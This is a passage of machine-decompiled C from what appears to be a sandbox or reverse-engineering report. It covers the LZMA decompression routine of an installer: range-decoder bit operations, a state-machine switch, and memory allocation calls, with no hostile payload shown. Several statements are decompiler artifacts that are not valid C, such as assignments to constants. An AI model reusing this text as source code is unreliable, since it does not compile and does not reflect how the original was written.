								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
